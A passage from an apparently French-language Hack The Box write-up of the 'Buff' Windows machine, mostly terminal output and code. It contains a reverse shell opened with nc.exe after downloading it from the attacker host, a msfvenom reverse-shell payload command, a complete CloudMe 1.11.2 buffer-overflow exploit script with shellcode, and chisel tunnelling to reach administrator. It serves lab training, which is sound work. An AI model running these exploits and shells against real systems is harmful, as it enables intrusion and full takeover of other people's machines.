class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 -m http.server <span class="m">8888</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">8888</span> <span class="o">(</span>http://0.0.0.0:8888/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.10.198 - - <span class="o">[</span>07/Jan/2025 17:07:08<span class="o">]</span> <span class="s2">&#34;GET /nc.exe HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="c1"># RCE from website</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; curl -O http://10.10.14.42:8888/nc.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; nc.exe 10.10.14.42 <span class="m">1337</span> -e cmd.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lvnp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.198<span class="o">]</span> <span class="m">50531</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17134.1610<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">buff<span class="se">\s</span>haun </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt;powershell </span></span><span class="line"><span class="cl">powershell </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege escalation </h2><h3 id="cloudme_1112exe">CloudMe_1112.exe </h3><p>En fouillant dans les fichiers, on trouve un exectutable <code>CloudMe_1112.exe</code>. Il se trouve que cette version tourne par défaut sur le port 8888 lorsqu&rsquo;on l&rsquo;execute, ce qui est bien le cas pour notre machine</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; tasklist <span class="p">|</span> findstr Cloud </span></span><span class="line"><span class="cl">tasklist <span class="p">|</span> findstr Cloud </span></span><span class="line"><span class="cl">CloudMe.exe <span class="m">284</span> <span class="m">0</span> 18,048 K </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; netstat -ano <span class="p">|</span> findstr LISTENING </span></span><span class="line"><span class="cl">netstat -ano <span class="p">|</span> findstr LISTENING </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:135 0.0.0.0:0 LISTENING <span class="m">944</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:445 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING <span class="m">6188</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING <span class="m">7832</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING <span class="m">8820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING <span class="m">524</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING <span class="m">1064</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING <span class="m">1644</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING <span class="m">2248</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING <span class="m">668</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING <span class="m">684</span> </span></span><span class="line"><span class="cl"> TCP 10.10.10.198:139 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING <span class="m">8936</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:135 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">944</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:445 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:7680 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">7832</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:8080 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">8820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49664 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">524</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49665 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1064</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49666 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1644</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49667 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2248</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49668 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">668</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49669 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">684</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="cloudme-1112---buffer-overflow">CloudMe 1.11.2 - Buffer Overflow </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ searchsploit cloudme </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">CloudMe 1.11.2 - Buffer Overflow <span class="o">(</span>PoC<span class="o">)</span> <span class="p">|</span> windows/remote/48389.py &lt;---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">CloudMe 1.11.2 - Buffer Overflow <span class="o">(</span>SEH_DEP_ASLR<span class="o">)</span> <span class="p">|</span> windows/local/48499.txt </span></span><span class="line"><span class="cl">CloudMe 1.11.2 - Buffer Overflow ROP <span class="o">(</span>DEP_ASLR<span class="o">)</span> <span class="p">|</span> windows/local/48840.py </span></span><span class="line"><span class="cl">Cloudme 1.9 - Buffer Overflow <span class="o">(</span>DEP<span class="o">)</span> <span class="o">(</span>Metasploit<span class="o">)</span> <span class="p">|</span> windows_x86-64/remote/45197.rb </span></span><span class="line"><span class="cl">CloudMe Sync 1.10.9 - Buffer Overflow <span class="o">(</span>SEH<span class="o">)(</span>DEP Bypass<span class="o">)</span> <span class="p">|</span> windows_x86-64/local/45159.py </span></span><span class="line"><span class="cl">CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow <span class="o">(</span>Metasploit<span class="o">)</span> <span class="p">|</span> windows/remote/44175.rb </span></span><span class="line"><span class="cl">CloudMe Sync 1.11.0 - Local Buffer Overflow <span class="p">|</span> windows/local/44470.py </span></span><span class="line"><span class="cl">CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt <span class="p">|</span> windows/remote/46218.py </span></span><span class="line"><span class="cl">CloudMe Sync 1.11.2 Buffer Overflow - WoW64 <span class="o">(</span>DEP Bypass<span class="o">)</span> <span class="p">|</span> windows_x86-64/remote/46250.py </span></span><span class="line"><span class="cl">CloudMe Sync &lt; 1.11.0 - Buffer Overflow <span class="p">|</span> windows/remote/44027.py </span></span><span class="line"><span class="cl">CloudMe Sync &lt; 1.11.0 - Buffer Overflow <span class="o">(</span>SEH<span class="o">)</span> <span class="o">(</span>DEP Bypass<span class="o">)</span> <span class="p">|</span> windows_x86-64/remote/44784.py </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span></code></pre></td></tr></table> </div> </div><p>Le fichier python contient un payload généré avec msfvenom mais qui ne fonctionne pas pour notre windows 10 x64 victime. Nous avons donc généré un nouveau payload. Ensuite, on a remplacer ce code dans le python.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -a x86 -p windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.42 <span class="nv">LPORT</span><span class="o">=</span><span class="m">9001</span> -b <span class="s1">&#39;\x00\x0A\x0D&#39;</span> -f python </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat exploit_cloudme.py </span></span><span class="line"><span class="cl"><span class="c1"># Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)</span> </span></span><span class="line"><span class="cl"><span class="c1"># Date: 2020-04-27</span> </span></span><span class="line"><span class="cl"><span class="c1"># Exploit Author: Andy Bowden</span> </span></span><span class="line"><span class="cl"><span class="c1"># Vendor Homepage: https://www.cloudme.com/en</span> </span></span><span class="line"><span class="cl"><span class="c1"># Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe</span> </span></span><span class="line"><span class="cl"><span class="c1"># Version: CloudMe 1.11.2</span> </span></span><span class="line"><span class="cl"><span class="c1"># Tested on: Windows 10 x86</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#Instructions:</span> </span></span><span class="line"><span class="cl"><span class="c1"># Start the CloudMe service and run the script.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">import socket </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">target</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">padding1</span> <span class="o">=</span> b<span class="s2">&#34;\x90&#34;</span> * <span class="m">1052</span> </span></span><span class="line"><span class="cl"><span class="nv">EIP</span> <span class="o">=</span> b<span class="s2">&#34;\xB5\x42\xA8\x68&#34;</span> <span class="c1"># 0x68A842B5 -&gt; PUSH ESP, RET</span> </span></span><span class="line"><span class="cl"><span class="nv">NOPS</span> <span class="o">=</span> b<span class="s2">&#34;\x90&#34;</span> * <span class="m">30</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">=</span> b<span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xbb\x9b\xa8\x51\x15\xdb\xd1\xd9\x74\x24\xf4\x5e&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2b\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\xc5&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xa6\xb3\xe0\x05\x5e\xb1\x0b\xf5\x9f\xd6\x82\x10&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xae\xd6\xf1\x51\x81\xe6\x72\x37\x2e\x8c\xd7\xa3&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xa5\xe0\xff\xc4\x0e\x4e\x26\xeb\x8f\xe3\x1a\x6a&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x0c\xfe\x4e\x4c\x2d\x31\x83\x8d\x6a\x2c\x6e\xdf&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x23\x3a\xdd\xcf\x40\x76\xde\x64\x1a\x96\x66\x99&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xeb\x99\x47\x0c\x67\xc0\x47\xaf\xa4\x78\xce\xb7&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xa9\x45\x98\x4c\x19\x31\x1b\x84\x53\xba\xb0\xe9&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x5b\x49\xc8\x2e\x5b\xb2\xbf\x46\x9f\x4f\xb8\x9d&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xdd\x8b\x4d\x05\x45\x5f\xf5\xe1\x77\x8c\x60\x62&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x7b\x79\xe6\x2c\x98\x7c\x2b\x47\xa4\xf5\xca\x87&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2c\x4d\xe9\x03\x74\x15\x90\x12\xd0\xf8\xad\x44&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xbb\xa5\x0b\x0f\x56\xb1\x21\x52\x3f\x76\x08\x6c&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xbf\x10\x1b\x1f\x8d\xbf\xb7\xb7\xbd\x48\x1e\x40&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xc1\x62\xe6\xde\x3c\x8d\x17\xf7\xfa\xd9\x47\x6f&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2a\x62\x0c\x6f\xd3\xb7\x83\x3f\x7b\x68\x64\xef&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x3b\xd8\x0c\xe5\xb3\x07\x2c\x06\x1e\x20\xc7\xfd&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xc9\x45\x12\xf3\x23\x32\x20\x0b\x17\xeb\xad\xed&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x3d\xfb\xfb\xa6\xa9\x62\xa6\x3c\x4b\x6a\x7c\x39&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x4b\xe0\x73\xbe\x02\x01\xf9\xac\xf3\xe1\xb4\x8e&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x52\xfd\x62\xa6\x39\x6c\xe9\x36\x37\x8d\xa6\x61&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x10\x63\xbf\xe7\x8c\xda\x69\x15\x4d\xba\x52\x9d&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x8a\x7f\x5c\x1c\x5e\x3b\x7a\x0e\xa6\xc4\xc6\x7a&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x76\x93\x90\xd4\x30\x4d\x53\x8e\xea\x22\x3d\x46&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x6a\x09\xfe\x10\x73\x44\x88\xfc\xc2\x31\xcd\x03&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xea\xd5\xd9\x7c\x16\x46\x25\x57\x92\x76\x6c\xf5&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xb3\x1e\x29\x6c\x86\x42\xca\x5b\xc5\x7a\x49\x69&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xb6\x78\x51\x18\xb3\xc5\xd5\xf1\xc9\x56\xb0\xf5&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x7e\x56\x91&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">payload</span> <span class="o">=</span> buf </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">overrun</span> <span class="o">=</span> b<span class="s2">&#34;C&#34;</span> * <span class="o">(</span><span class="m">1500</span> - len<span class="o">(</span>padding1 + NOPS + EIP + payload<span class="o">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">=</span> padding1 + EIP + NOPS + payload + overrun </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">try: </span></span><span class="line"><span class="cl"> <span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET, socket.SOCK_STREAM<span class="o">)</span> </span></span><span class="line"><span class="cl"> s.connect<span class="o">((</span>target,8888<span class="o">))</span> </span></span><span class="line"><span class="cl"> s.send<span class="o">(</span>buf<span class="o">)</span> </span></span><span class="line"><span class="cl">except Exception as e: </span></span><span class="line"><span class="cl"> print<span class="o">(</span>sys.exc_value<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="chisel---port-forwarding-8888">Chisel - port forwarding (8888) </h3><p>Mise en place de chisel, pour dupliquer le port 8888 de la machine cible sur la machine locale. EN effet, ce port n&rsquo;est accessible que depuis la machine cible normalement : Or, pour exploiter notre vuln, avec le script python , il faut que le port soit accessible sur notre machine local qui dispose bien de python.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kali@kali:~/htb/Buff$ ./chisel server -p <span class="m">1082</span> --reverse </span></span><span class="line"><span class="cl">2025/01/10 20:17:44 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/01/10 20:17:44 server: Fingerprint iiSKQuGUrbyvUjt5afbcmjecM6T6JHMCaV2+4LBLk3g<span class="o">=</span> </span></span><span class="line"><span class="cl">2025/01/10 20:17:44 server: Listening on http://0.0.0.0:1082 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/01/10 20:19:07 server: session#1: tun: proxy#R:8888<span class="o">=</span>&gt;localhost:8888: Listening </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="c1"># Windows target</span> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; .<span class="se">\c</span>hisel.exe client 10.10.14.42:1082 R:8888:localhost:8888 </span></span><span class="line"><span class="cl">.<span class="se">\c</span>hisel.exe client 10.10.14.42:1082 R:8888:localhost:8888 </span></span><span class="line"><span class="cl">2025/01/11 01:19:06 client: Connecting to ws://10.10.14.42:1082 </span></span><span class="line"><span class="cl">2025/01/11 01:19:07 client: Connected <span class="o">(</span>Latency 22.8931ms<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploitation-roottxt">Exploitation (root.txt) </h3><p>Enfin, on execute l&rsquo;exploit final et on obtient un shell en tant que root sur la machine windows :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Buff<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit_cloudme.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Buff<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit_cloudme.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Buff<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit_cloudme.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">9001</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.198<span class="o">]</span> <span class="m">49685</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17134.1610<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">buff<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt;cd ../../Users/Administrator/Desktop </span></span><span class="line"><span class="cl"><span class="nb">cd</span> ../../Users/Administrator/Desktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt;cat root.txt </span></span><span class="line"><span class="cl">cat root.txt </span></span><span class="line"><span class="cl"><span class="s1">&#39;cat&#39;</span> is not recognized as an internal or external command, </span></span><span class="line"><span class="cl">operable program or batch file. </span></span><span class="line"><span class="cl"> 